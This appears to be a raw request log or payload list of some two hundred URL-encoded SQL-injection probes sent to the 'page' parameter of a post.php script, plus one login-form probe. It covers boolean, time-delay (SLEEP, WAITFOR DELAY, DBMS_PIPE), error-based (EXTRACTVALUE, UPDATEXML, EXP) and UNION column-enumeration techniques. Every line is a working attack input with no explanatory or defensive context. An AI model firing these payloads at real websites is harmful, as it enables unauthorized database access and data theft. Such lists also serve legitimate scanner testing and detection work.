/test/website/post.php?page=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20UdVG
/test/website/post.php?page=1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20tttV
/test/website/post.php?page=1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20iBFj
/test/website/post.php?page=1%60%29%20WHERE%203492%3D3492%20AND%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%285882%3D5882%2C1%29%29%29%2C0x7178787a71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29--%20lDPv
/test/website/post.php?page=-3043%22%20UNION%20ALL%20SELECT%202088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088%2C2088--%20jaRF
/test/website/post.php?page=1%20AND%207697%3D7697%23%20XXXh
/test/website/post.php?page=1%29%20AS%20ZDgG%20WHERE%202159%3D2159%3BSELECT%20SLEEP%285%29%23
/test/website/post.php?page=-4357%27%29%29%29%20UNION%20ALL%20SELECT%206799%2C6799%2C6799%2C6799--%20QWOl
/test/website/post.php?page=1%25%22%29%20AND%20EXP%28%7E%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%284317%3D4317%2C1%29%29%29%2C0x7178787a71%2C0x78%29%29x%29%29%20AND%20%28%22%25%22%3D%22
/test/website/post.php?page=1%20AND%203085%3D3571
/test/website/post.php?page=1%27%29%29%20AS%20lzat%20WHERE%202371%3D2371%20AND%20SLEEP%285%29--%20qtiT
/test/website/post.php?page=1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20Bcgk
/test/website/post.php?page=1%27%29%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29VKWU%29%23
/test/website/post.php?page=-9550%27%29%20UNION%20ALL%20SELECT%209827%2C9827%2C9827%2C9827%2C9827%2C9827%2C9827%2C9827%2C9827%2C9827%2C9827%2C9827%2C9827%2C9827%2C9827%2C9827%2C9827--%20cyEG
/test/website/post.php?page=1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20KIQC
/test/website/post.php?page=1%22%29%29%29%20AND%20EXTRACTVALUE%289193%2CCONCAT%280x5c%2C0x71767a6a71%2C%28SELECT%20%28ELT%289193%3D9193%2C1%29%29%29%2C0x7178787a71%29%29%20AND%20%28%28%28%22GkGb%22%3D%22GkGb
/test/website/post.php?page=1%60%29%20WHERE%201512%3D1512%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20Wywd
/test/website/post.php?page=1%29%29%20AS%20TwGe%20WHERE%201845%3D1845%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20qGnD
/test/website/post.php?page=1%29%29%20AS%20NFij%20WHERE%209127%3D9127%20AND%205909%3D2197%23
/test/website/post.php?page=1%29%20AS%20iSJW%20WHERE%208738%3D8738%20AND%206419%3D6864%23
/test/website/post.php?page=1%29%29%20AS%20skzU%20WHERE%201338%3D1338%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL--%20YEFy
/test/website/post.php?page=1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20hpAn
/test/website/post.php?page=1%25%22%29%29%29%20AND%20ELT%288416%3D8416%2CSLEEP%285%29%29%20AND%20%28%28%28%22%25%22%3D%22
/test/website/post.php?page=1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20ahbD
/test/website/post.php?page=1%27%20IN%20BOOLEAN%20MODE%29%20AND%204478%3D8551--%20bWOj
/test/website/post.php?page=-6187%29%20AS%20xFFJ%20WHERE%207427%3D7427%20UNION%20ALL%20SELECT%207427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427%2C7427--%20hUhr
/test/website/post.php?page=1%25%22%20RLIKE%20SLEEP%285%29%20AND%20%22%25%22%3D%22
/test/website/post.php?page=1%25%27%29%29%20AND%209200%3D1643%20AND%20%28%28%27%25%27%3D%27
/test/website/post.php?page=1%22%29%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%286172%3D6172%29%20THEN%201%20ELSE%200x28%20END%29%29%20AND%20%28%22goIL%22%20LIKE%20%22goIL
/test/website/post.php?page=1%27%29%20RLIKE%20SLEEP%285%29%20AND%20%28%27AVro%27%20LIKE%20%27AVro
/test/website/post.php?page=1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20cKqv
/test/website/post.php?page=1%29%29%20AND%20ROW%286887%2C7898%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%286887%3D6887%2C1%29%29%29%2C0x7178787a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209578%20UNION%20SELECT%204916%20UNION%20SELECT%206664%20UNION%20SELECT%206501%29a%20GROUP%20BY%20x%29%20AND%20%28%281462%3D1462
/test/website/post.php?page=1%29%20AND%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%285882%3D5882%2C1%29%29%29%2C0x7178787a71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29--%20GOpt
/test/website/post.php?page=-5206%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709%2C7709--%20oZpm
/test/website/post.php?page=1%27%29%29%20AND%201101%3D1101%23
/test/website/post.php?page=1%22%29%29%29%20AND%20ROW%286887%2C7898%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%286887%3D6887%2C1%29%29%29%2C0x7178787a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%209578%20UNION%20SELECT%204916%20UNION%20SELECT%206664%20UNION%20SELECT%206501%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%22oRic%22%20LIKE%20%22oRic
/test/website/post.php?page=1%25%22%29%3BSELECT%20%28CASE%20WHEN%20%283469%3D5197%29%20THEN%203469%20ELSE%203469%2A%28SELECT%203469%20FROM%20mysql.db%29%20END%29%23
/test/website/post.php?page=1%27%29%20AS%20gAUp%20WHERE%202132%3D2132%20AND%209467%3D9467--%20nhqK
/test/website/post.php?page=-4359%27%29%20ORDER%20BY%201--%20lGWb
/test/website/post.php?page=1%2C%28SELECT%20%28CASE%20WHEN%20%288362%3D8362%29%20THEN%201%20ELSE%208362%2A%28SELECT%208362%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%29
/test/website/post.php?page=-1795%22%29%20UNION%20ALL%20SELECT%201676%2C1676%2C1676%2C1676%2C1676%2C1676%2C1676%2C1676%2C1676%2C1676--%20ZbOC
/test/website/post.php?page=1%29%20AS%20Qhoh%20WHERE%208036%3D8036%20AND%208361%3D9475--%20lwWo
/test/website/post.php?page=-9137%20UNION%20ALL%20SELECT%207620%2C7620%2C7620%2C7620%2C7620%2C7620%2C7620--%20atIZ
/test/website/post.php?page=1%22%29%29%29%20AND%20EXP%28%7E%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%284317%3D4317%2C1%29%29%29%2C0x7178787a71%2C0x78%29%29x%29%29%20AND%20%28%28%28%22mZSM%22%3D%22mZSM
/test/website/post.php?page=-6499%22%29%29%20UNION%20ALL%20SELECT%203991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991%2C3991--%20DjkC
/test/website/post.php?page=1%25%27%20AND%20ELT%288416%3D8416%2CSLEEP%285%29%29%20AND%20%27%25%27%3D%27
/test/website/post.php?page=-1405%60%29%20WHERE%207375%3D7375%20UNION%20ALL%20SELECT%207375%2C7375%2C7375%2C7375%2C7375%2C7375%2C7375--%20qSOR
/test/website/post.php?page=1%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23
/test/website/post.php?page=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20TxNY
/test/website/post.php?page=1%22%20WHERE%205914%3D5914%20AND%20EXTRACTVALUE%289193%2CCONCAT%280x5c%2C0x71767a6a71%2C%28SELECT%20%28ELT%289193%3D9193%2C1%29%29%29%2C0x7178787a71%29%29--%20zoJb
/test/website/post.php?page=ELT%287539%3D2845%2C1%29
/test/website/post.php?page=-6922%22%20UNION%20ALL%20SELECT%205116%2C5116%2C5116%2C5116%2C5116%2C5116%2C5116%2C5116%2C5116%2C5116%2C5116%2C5116%2C5116%2C5116%2C5116%2C5116%2C5116%2C5116--%20ynBx
/test/website/post.php?page=-7892%22%29%29%20AS%20ngTB%20WHERE%208621%3D8621%20UNION%20ALL%20SELECT%208621%2C8621%2C8621%2C8621--%20zBTg
/test/website/post.php?page=1%27%29%29%20AS%20tlgA%20WHERE%205213%3D5213%20AND%207764%3D7161--%20knAt
/test/website/post.php?page=1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20YWJX
/test/website/post.php?page=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20FwXA
/test/website/post.php?page=1%2CEXTRACTVALUE%281959%2CCONCAT%280x5c%2C0x71767a6a71%2C%28SELECT%20%28ELT%281959%3D1959%2C1%29%29%29%2C0x7178787a71%29%29
/test/website/post.php?page=1%25%22%29%20AND%20MAKE_SET%282898%3D2898%2C8166%29%20AND%20%28%22%25%22%3D%22
/test/website/post.php?page=1%25%27%29%29%29%3BSELECT%20SLEEP%285%29%23
/test/website/post.php?page=1%22%29%20AS%20wmgW%20WHERE%207212%3D7212%3BSELECT%20SLEEP%285%29--%20hwXu
/test/website/post.php?page=1%29%20AS%20oQSf%20WHERE%207045%3D7045%3BSELECT%20SLEEP%285%29--%20dALd
/test/website/post.php?page=-2244%20UNION%20ALL%20SELECT%208053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053%2C8053--%20Twhh
/test/website/post.php?page=1%27%29%29%29%20AND%207870%3D7870%20AND%20%28%28%28%27EhaW%27%3D%27EhaW
/test/website/post.php?page=1%29%29%20AND%20ELT%288416%3D8416%2CSLEEP%285%29%29%20AND%20%28%289404%3D9404
/test/website/post.php?page=1%22%3BSELECT%20%28CASE%20WHEN%20%281034%3D1034%29%20THEN%201034%20ELSE%201034%2A%28SELECT%201034%20FROM%20mysql.db%29%20END%29%23
/test/website/post.php?page=1%20AND%20%28SELECT%206282%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%286282%3D6282%2C1%29%29%29%2C0x7178787a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%23%20BIvq
/test/website/post.php?page=1%27%29%29%29%20AND%20EXTRACTVALUE%289193%2CCONCAT%280x5c%2C0x71767a6a71%2C%28SELECT%20%28ELT%289193%3D9193%2C1%29%29%29%2C0x7178787a71%29%29%20AND%20%28%28%28%27uBrc%27%20LIKE%20%27uBrc
/test/website/post.php?page=1%20AND%203738%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2878%29%7C%7CCHR%2875%29%7C%7CCHR%28119%29%7C%7CCHR%2875%29%2C5%29
/test/website/post.php?page=1%60%29%20WHERE%209782%3D9782%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20bxDT
/test/website/post.php?page=1%22%29%29%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%286172%3D6172%29%20THEN%201%20ELSE%200x28%20END%29%29%20AND%20%28%28%22SWyw%22%3D%22SWyw
/test/website/post.php?page=1%27%29%20AND%20ELT%288416%3D8416%2CSLEEP%285%29%29%20AND%20%28%27RQWS%27%20LIKE%20%27RQWS
/test/website/post.php?page=1%25%27%29%20AND%20ELT%289333%3D5921%2C5921%29%20AND%20%28%27%25%27%3D%27
/test/website/post.php?page=1%27%29%20AS%20Gryf%20WHERE%207489%3D7489%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20xMqz
/test/website/post.php?page=1%27%29%20AND%203738%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2878%29%7C%7CCHR%2875%29%7C%7CCHR%28119%29%7C%7CCHR%2875%29%2C5%29%20AND%20%28%27JZFp%27%3D%27JZFp
/test/website/post.php?page=1%27%29%29%29%3BSELECT%20SLEEP%285%29%20AND%20%28%28%28%27PIrY%27%20LIKE%20%27PIrY
/test/website/post.php?page=1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20VKgT
/test/website/post.php?page=-9723%25%22%29%29%29%20UNION%20ALL%20SELECT%208536%2C8536%2C8536%2C8536%2C8536%2C8536%2C8536%2C8536%2C8536%2C8536%2C8536%2C8536--%20gsac
/test/website/post.php?page=1%22%29%20AS%20aOlV%20WHERE%208401%3D8401%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20OOtq
/test/website/post.php?page=-9590%29%20UNION%20ALL%20SELECT%204372%2C4372%2C4372%2C4372%2C4372%2C4372%2C4372%2C4372%2C4372%2C4372%2C4372%2C4372%2C4372%2C4372%2C4372%2C4372--%20hBzg
/test/website/post.php?page=1%27%20ORDER%20BY%201839%23
/test/website/post.php?page=1%27%3BSELECT%20SLEEP%285%29%23
/test/website/post.php?page=1%29%29%20AND%207697%3D7697%20AND%20%28%288006%3D8006
/test/website/post.php?page=1%20ORDER%20BY%201--%20OvSH
/test/website/post.php?page=1%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20TIQJ
/test/website/post.php?page=1%27%20IN%20BOOLEAN%20MODE%29%20AND%20UPDATEXML%289183%2CCONCAT%280x2e%2C0x71767a6a71%2C%28SELECT%20%28ELT%289183%3D9183%2C1%29%29%29%2C0x7178787a71%29%2C4408%29%23
/test/website/post.php?page=1%25%27%29%29%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29GZlk%29%20AND%20%28%28%27%25%27%3D%27
/test/website/post.php?page=1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20BVrL
/test/website/post.php?page=1%27%29%20AS%20jUNl%20WHERE%209231%3D9231%3BSELECT%20%28CASE%20WHEN%20%287474%3D7474%29%20THEN%207474%20ELSE%207474%2A%28SELECT%207474%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%23
/test/website/post.php?page=1%22%29%29%29%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29GZlk%29%20AND%20%28%28%28%22RCqz%22%20LIKE%20%22RCqz
/test/website/post.php?page=1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20bbyZ
/test/website/post.php?page=1%20AND%20SLEEP%285%29--%20WOMc
/test/website/post.php?page=1%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%286743%3D6743
/test/website/post.php?page=1%25%27%29%20AND%20SLEEP%285%29%20AND%20%28%27%25%27%3D%27
/test/website/post.php?page=1%29%20WHERE%202313%3D2313%20AND%201919%3D7799--%20kZRs
/test/website/post.php?page=1%27%29%29%20AS%20KpZM%20WHERE%206266%3D6266%3BSELECT%20%28CASE%20WHEN%20%287356%3D5703%29%20THEN%207356%20ELSE%207356%2A%28SELECT%207356%20FROM%20mysql.db%29%20END%29%23
/test/website/post.php?page=1%27%7C%7C%28SELECT%20%27svke%27%20FROM%20DUAL%20WHERE%205109%3D5109%20AND%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%288004%3D8004%2C1%29%29%29%2C0x7178787a71%29%29%20USING%20utf8%29%29%29%29%7C%7C%27
/test/website/post.php?page=1%22%29%29%29%20AND%20MAKE_SET%286049%3D7963%2C7963%29%20AND%20%28%28%28%22niDR%22%3D%22niDR
/test/website/post.php?page=1%27%29%20RLIKE%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29qVYX%29%20AND%20%28%27hlBf%27%20LIKE%20%27hlBf
/test/website/post.php?page=-7091%60%29%20WHERE%204678%3D4678%20UNION%20ALL%20SELECT%204678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678%2C4678--%20DayU
/test/website/post.php?page=-6087%22%29%29%29%20UNION%20ALL%20SELECT%202231%2C2231%2C2231%2C2231%2C2231%2C2231%2C2231%2C2231%2C2231%2C2231%2C2231%2C2231%2C2231%2C2231%2C2231%2C2231%2C2231%2C2231%2C2231%2C2231--%20avME
/test/website/post.php?page=1%60%20WHERE%205708%3D5708%20AND%204397%3D7878--%20BCto
/test/website/post.php?page=1%22%20AND%20ELT%288266%3D4330%2C4330%29--%20rEvT
/test/website/post.php?page=1%27%29%29%20AS%20LaJD%20WHERE%201562%3D1562%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20PWWA
/test/website/post.php?page=1%25%22%29%29%20AND%20MAKE_SET%281704%3D2306%2C2306%29%20AND%20%28%28%22%25%22%3D%22
/test/website/post.php?page=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20mlZt
/test/website/post.php?page=1%27%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%27vZeX%27%3D%27vZeX
/test/website/post.php?page=1%25%22%29%29%29%20AND%204184%3D7501--%20dyhD
/test/website/post.php?page=-2543%27%20UNION%20ALL%20SELECT%202895%2C2895%2C2895%2C2895%2C2895%2C2895%2C2895--%20rDfF
/test/website/post.php?page=-7999%22%29%29%29%20ORDER%20BY%201--%20yRVp
/test/website/post.php?page=-9283%22%29%29%29%20UNION%20ALL%20SELECT%207275%2C7275--%20cJSC
/test/website/post.php?page=1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20AvAK
/test/website/post.php?page=1%22%29%20AND%20%28SELECT%202%2A%28IF%28%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%285882%3D5882%2C1%29%29%29%2C0x7178787a71%2C0x78%29%29s%29%2C%208446744073709551610%2C%208446744073709551610%29%29%29%20AND%20%28%22nBDP%22%3D%22nBDP
/test/website/post.php?page=1%25%22%29%29%3BSELECT%20%28CASE%20WHEN%20%286269%3D6852%29%20THEN%206269%20ELSE%206269%2A%28SELECT%206269%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%23
/test/website/post.php?page=-8906%25%27%29%29%29%20UNION%20ALL%20SELECT%206813%2C6813%2C6813%2C6813%2C6813%2C6813--%20WFdd
/test/website/post.php?page=1%22%20RLIKE%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29qVYX%29%20AND%20%22HaWO%22%3D%22HaWO
/test/website/post.php?page=1%27%20AND%204965%3D1914--%20JxIA
/test/website/post.php?page=1%27%20AND%203952%3D3952%20AND%20%27bQjJ%27%3D%27bQjJ
/test/website/post.php?page=1%22%29%29%20AND%207870%3D7870%20AND%20%28%28%22sLZv%22%3D%22sLZv
/test/website/post.php?page=1%20AND%203300%3D1853%23
/test/website/post.php?page=-2911%27%20UNION%20ALL%20SELECT%207986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986%2C7986--%20VdHp
/test/website/post.php?page=1%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20sPeP
/test/website/post.php?page=1%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL--%20XcWl
/test/website/post.php?page=1%22%29%29%29%20AND%20EXP%28%7E%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%284317%3D4317%2C1%29%29%29%2C0x7178787a71%2C0x78%29%29x%29%29%20AND%20%28%28%28%22eyll%22%20LIKE%20%22eyll
/test/website/post.php?page=1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20LrPH
/test/website/post.php?page=1%27%29%29%20AND%209467%3D9467--%20JCtt
/test/website/post.php?page=1%22%29%29%20AS%20kEog%20WHERE%208717%3D8717%3B%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29GZlk%29--%20wbsI
/test/website/post.php?page=1%27%29%29%29%20AND%20EXP%28%7E%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%284317%3D4317%2C1%29%29%29%2C0x7178787a71%2C0x78%29%29x%29%29%20AND%20%28%28%28%27Dslx%27%20LIKE%20%27Dslx
/test/website/post.php?page=1%25%27%29%29%29%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29VxDZ%29%20AND%20%28%28%28%27%25%27%3D%27
/test/website/post.php?page=1%29%29%20AS%20UgDV%20WHERE%209283%3D9283%3BSELECT%20%28CASE%20WHEN%20%286298%3D3687%29%20THEN%206298%20ELSE%206298%2A%28SELECT%206298%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%29%20END%29%23
/test/website/post.php?page=1%29%3BSELECT%20SLEEP%285%29%23
/test/website/post.php?page=1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23
/test/website/post.php?page=1%27%29%29%20AND%208226%3D9808%20AND%20%28%28%27Gfbw%27%3D%27Gfbw
/test/website/post.php?page=1%22%29%29%20AS%20qOKL%20WHERE%208033%3D8033%20AND%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%288004%3D8004%2C1%29%29%29%2C0x7178787a71%29%29%20USING%20utf8%29%29%29--%20gFan
/test/website/post.php?page=1%20RLIKE%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29qVYX%29
/test/website/post.php?page=1%22%20AND%20EXTRACTVALUE%289193%2CCONCAT%280x5c%2C0x71767a6a71%2C%28SELECT%20%28ELT%289193%3D9193%2C1%29%29%29%2C0x7178787a71%29%29--%20uaRT
/test/website/post.php?page=1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20Rzpv
/test/website/post.php?page=1%25%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20MmmD
/test/website/post.php?page=1%29%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%283445%3D3588%29%20THEN%201%20ELSE%200x28%20END%29%29%20AND%20%286927%3D6927
/test/website/post.php?page=1%60%29%20WHERE%208424%3D8424%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20SZRf
/test/website/post.php?page=-4646%27%29%29%29%20UNION%20ALL%20SELECT%203360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360%2C3360--%20Tapp
/test/website/post.php?page=-5739%29%20AS%20BlxY%20WHERE%206431%3D6431%20UNION%20ALL%20SELECT%206431%2C6431%2C6431%2C6431%2C6431%2C6431%2C6431%2C6431--%20LbQo
/test/website/post.php?page=1%29%29%20AS%20YHSD%20WHERE%207091%3D7091%20AND%20%28SELECT%206282%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%286282%3D6282%2C1%29%29%29%2C0x7178787a71%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29--%20OhZd
/test/website/post.php?page=-6936%22%29%29%29%20UNION%20ALL%20SELECT%206665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665%2C6665--%20CbdX
/test/website/post.php?page=1%25%22%29%29%20AND%20EXP%28%7E%28SELECT%20%2A%20FROM%20%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%284317%3D4317%2C1%29%29%29%2C0x7178787a71%2C0x78%29%29x%29%29%20AND%20%28%28%22%25%22%3D%22
/test/website/post.php?page=1%20ORDER%20BY%207035%23
/test/website/index.php?username=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&password=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&name=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&
/test/website/post.php?page=1%25%22%29%29%29%20AND%208820%3D8820%23
/test/website/post.php?page=1%22%20AND%20SLEEP%285%29%20AND%20%22DNcQ%22%20LIKE%20%22DNcQ
/test/website/post.php?page=1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20rKrF
/test/website/post.php?page=1%60%29%20WHERE%203502%3D3502%20AND%20JSON_KEYS%28%28SELECT%20CONVERT%28%28SELECT%20CONCAT%280x71767a6a71%2C%28SELECT%20%28ELT%288004%3D8004%2C1%29%29%29%2C0x7178787a71%29%29%20USING%20utf8%29%29%29--%20lYFe
